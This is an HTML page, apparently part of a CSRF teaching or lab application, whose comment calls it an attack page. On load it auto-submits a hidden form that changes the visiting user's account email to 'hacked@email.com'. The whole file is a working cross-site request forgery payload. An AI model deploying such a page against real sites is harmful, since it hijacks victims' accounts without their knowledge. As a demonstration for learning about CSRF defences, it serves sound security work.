<!-- This is the the CSRF attack performing page, which runs a malicious
  -- script that changes the user email. -->

<!DOCTYPE html>
<html lang="en">
<body onload=" document.myform.submit()">

<form hidden method="POST" name="myform" action="/attacks/csrf/email-update">
    <fieldset class="form-group">
        <legend class="border-bottom mb-4">Profile info</legend>
        <tr>
            <th>
                <label for="id_email">Email:</label>
            </th>
            <td>
                <input type="email" name="email" value="hacked@email.com" required id="id_email">
            </td>
        </tr>
    </fieldset>
</form>

</body>
</html>